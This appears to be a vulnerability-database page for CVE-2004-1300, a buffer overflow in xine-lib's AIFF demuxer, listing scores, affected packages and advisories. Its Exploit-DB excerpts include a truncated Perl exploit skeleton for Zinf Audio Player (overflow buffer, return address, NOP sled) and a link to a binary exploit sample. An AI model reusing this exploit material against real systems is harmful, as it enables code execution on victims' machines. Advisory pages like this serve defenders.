CVE-2004-1300
published 2005-01-10CVE-2004-1300: Buffer overflow in the open_aiff_file function in demux_aiff.c for xine-lib (libxine) 1-rc7 allows remote attackers to execute arbitrary code via a crafted…
PriorityP338critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
9.11%
94.7th percentile
Buffer overflow in the open_aiff_file function in demux_aiff.c for xine-lib (libxine) 1-rc7 allows remote attackers to execute arbitrary code via a crafted AIFF file.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | vlc | — | — |
| xine | xine-lib | — | — |
CVSS provenance
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vendor_debian10.0LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-h6mm-r226-gfhq: Buffer overflow in the open_aiff_file function in demux_aiff
ghsa_unreviewed·2022-04-29
CVE-2004-1300 [HIGH] GHSA-h6mm-r226-gfhq: Buffer overflow in the open_aiff_file function in demux_aiff
Buffer overflow in the open_aiff_file function in demux_aiff.c for xine-lib (libxine) 1-rc7 allows remote attackers to execute arbitrary code via a crafted AIFF file.
Debian
CVE-2004-1300: vlc - Buffer overflow in the open_aiff_file function in demux_aiff.c for xine-lib (lib...
vendor_debian·2004·CVSS 10.0
CVE-2004-1300 [CRITICAL] CVE-2004-1300: vlc - Buffer overflow in the open_aiff_file function in demux_aiff.c for xine-lib (lib...
Buffer overflow in the open_aiff_file function in demux_aiff.c for xine-lib (libxine) 1-rc7 allows remote attackers to execute arbitrary code via a crafted AIFF file.
Scope: local
bookworm: resolved
bullseye: resolved
forky: resolved
sid: resolved
trixie: resolved
No detection rules found.
Exploit-DB
Zinf Audio Player 2.2.1 - '.pls' Universal Local Buffer Overflow
exploitdb·2009-01-28
CVE-2004-0964 Zinf Audio Player 2.2.1 - '.pls' Universal Local Buffer Overflow
Zinf Audio Player 2.2.1 - '.pls' Universal Local Buffer Overflow
---
#!/usr/bin/perl -w
# Author : Houssamix
# Zinf Audio Player 2.2.1 (PLS File) Universal Local Buffer Overflow exploit
# tested in windows pro Sp 2 (french)
print "===================================================================== \n";
print "Author : Houssamix \n";
print "===================================================================== \n";
print "Zinf Audio Player 2.2.1 Universal Local Buffer Overflow exploit \n";
print "===================================================================== \n";
my $overflow = "\x41" x 1300;
my $ret = "\xC8\x2C\x00\x10"; #0x10002CC8 push esp - ret > universal adress(vorbisfile.dll)
my $nop = "\x90" x 128 ;
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum h
Exploit-DB
Xine-Lib 0.9/1 - Remote Client-Side Buffer Overflow
exploitdb·2004-12-16
CVE-2004-1300 Xine-Lib 0.9/1 - Remote Client-Side Buffer Overflow
Xine-Lib 0.9/1 - Remote Client-Side Buffer Overflow
---
source: https://www.securityfocus.com/bid/11969/info
It is reported that the xine media library is affected by a remote buffer overflow vulnerability. This issue can allow a remote attacker to gain unauthorized access to a vulnerable computer. The overflow condition presents itself in the 'demux_aiff.c' file.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24978.avi
Exploit-DB
Dell TrueMobile 1300 WLAN System 3.10.39.0 Tray Applet - Local Privilege Escalation
exploitdb·2004-02-22
CVE-2004-2359 Dell TrueMobile 1300 WLAN System 3.10.39.0 Tray Applet - Local Privilege Escalation
Dell TrueMobile 1300 WLAN System 3.10.39.0 Tray Applet - Local Privilege Escalation
---
source: https://www.securityfocus.com/bid/9714/info
It has been reported that a privilege escalation vulnerability exists in the Dell TrueMobile 1300 Wireless System Tray Applet. The issue is due to the software starting with SYSTEM privileges, to enable access to the wireless hardware, and subsequently failing to drop them.
This may allow a local attacker to manipulate the GUI of the vulnerable application to spawn arbitrary processes with the privileges of the affected process.
Although only version 3.10.39.0 of the utility has been reported vulnerable, it is likely that other versions are prone as well.
After launching the affected application, right click in the application window and choose H
No writeups or analysis indexed.
http://tigger.uic.edu/~jlongs2/holes/xine-lib.txthttp://www.mandriva.com/security/advisories?name=MDKSA-2005:011https://exchange.xforce.ibmcloud.com/vulnerabilities/18611http://tigger.uic.edu/~jlongs2/holes/xine-lib.txthttp://www.mandriva.com/security/advisories?name=MDKSA-2005:011https://exchange.xforce.ibmcloud.com/vulnerabilities/18611
2005-01-10
Published